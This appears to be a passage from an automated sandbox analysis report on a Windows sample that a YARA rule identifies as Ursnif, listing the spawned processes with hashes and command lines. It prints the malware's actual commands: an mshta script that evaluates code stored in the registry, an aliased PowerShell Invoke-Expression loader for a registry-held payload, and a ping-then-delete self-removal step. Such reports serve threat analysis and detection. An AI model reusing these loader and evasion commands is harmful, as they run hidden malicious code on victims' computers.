                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:23
                          Start time:08:12:28
                          Start date:23/04/2022
                          Path:C:\Windows\System32\mshta.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                          Imagebase:0x7ff701c00000
                          File size:14848 bytes
                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:24
                          Start time:08:12:31
                          Start date:23/04/2022
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                          Imagebase:0x7ff6ba650000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:high

                          General

                          Target ID:25
                          Start time:08:12:31
                          Start date:23/04/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:26
                          Start time:08:12:38
                          Start date:23/04/2022
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline
                          Imagebase:0x7ff7979b0000
                          File size:2739304 bytes
                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:moderate

                          General

                          Target ID:27
                          Start time:08:12:40
                          Start date:23/04/2022
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2392.tmp" "c:\Users\user\AppData\Local\Temp\poet0yxq\CSCB57F583549494C91A9647985948976.TMP"
                          Imagebase:0x7ff7871c0000
                          File size:47280 bytes
                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          General

                          Target ID:28
                          Start time:08:12:43
                          Start date:23/04/2022
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.cmdline
                          Imagebase:0x7ff7979b0000
                          File size:2739304 bytes
                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          General

                          Target ID:29
                          Start time:08:12:46
                          Start date:23/04/2022
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3B60.tmp" "c:\Users\user\AppData\Local\Temp\bscdh0f0\CSCCEA1AC591E3E41DFA7DCA22F6F20A95.TMP"
                          Imagebase:0x7ff7871c0000
                          File size:47280 bytes
                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:30
                          Start time:08:12:49
                          Start date:23/04/2022
                          Path:C:\Windows\System32\control.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\control.exe -h
                          Imagebase:0x7ff61b590000
                          File size:117760 bytes
                          MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:32
                          Start time:08:12:52
                          Start date:23/04/2022
                          Path:C:\Windows\System32\rundll32.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                          Imagebase:0x7ff7567e0000
                          File size:69632 bytes
                          MD5 hash:73C519F050C20580F8A62C849D49215A
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:33
                          Start time:08:12:54
                          Start date:23/04/2022
                          Path:C:\Windows\explorer.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Explorer.EXE
                          Imagebase:0x7ff6f3b00000
                          File size:3933184 bytes
                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:37
                          Start time:08:13:12
                          Start date:23/04/2022
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\VoevdOQpeU.dll
                          Imagebase:0x7ff7bb450000
                          File size:273920 bytes
                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:38
                          Start time:08:13:12
                          Start date:23/04/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:39
                          Start time:08:13:13
                          Start date:23/04/2022
                          Path:C:\Windows\System32\PING.EXE
                          Wow64 process (32bit):false
                          Commandline:ping localhost -n 5
                          Imagebase:0x7ff69dae0000
                          File size:21504 bytes
                          MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Disassembly

                          No disassembly